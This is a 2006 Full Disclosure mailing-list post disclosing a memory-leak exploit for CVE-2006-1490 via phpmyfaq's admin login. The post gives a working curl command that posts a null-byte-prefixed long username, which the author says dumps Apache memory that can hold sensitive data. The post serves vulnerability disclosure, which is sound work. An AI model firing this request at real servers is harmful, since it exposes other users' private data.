Full Disclosure mailing list archives
phpmyfaq exploit using PHP bug, CVE-2006-1490
From: Tonu Samuel <tonu () jes ee>
Date: Fri, 1 Dec 2006 16:57:41 +0200
Long time ago I made unneccesary noise about PHP zeroday. I expected it to be maybe much more dangerous that it appeared to be at end. There was lot of disscussions and one of main consensus was that this bug is not exploitable in real world because noone is using those vulnerable functions. This bug was originally found using phpmyfaq software and wrong assumption was made about wideness of problem. Anyway now half year later it is time to show exploit: curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" Longer input you provide, longer memory dump you get. Works if PHP is unpatched AND phpmyfaq is older than 1.6.0. Memory dump you get is part of apache memory and often contains sensitive information from other served pages and contexts. To make it clear - this is NOT fault of phpmyfaq people at all. Even more, they made workaround within an hour after I contacted them and urged users to upgrade. Just phpmyfaq appears to be one popular software which is easily findable by Google and this was the software where initially discovery was made. PHP people knew about problem but ignored for long enough to discover it independently from them. Tõnu _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- phpmyfaq exploit using PHP bug, CVE-2006-1490 Tonu Samuel (Dec 01)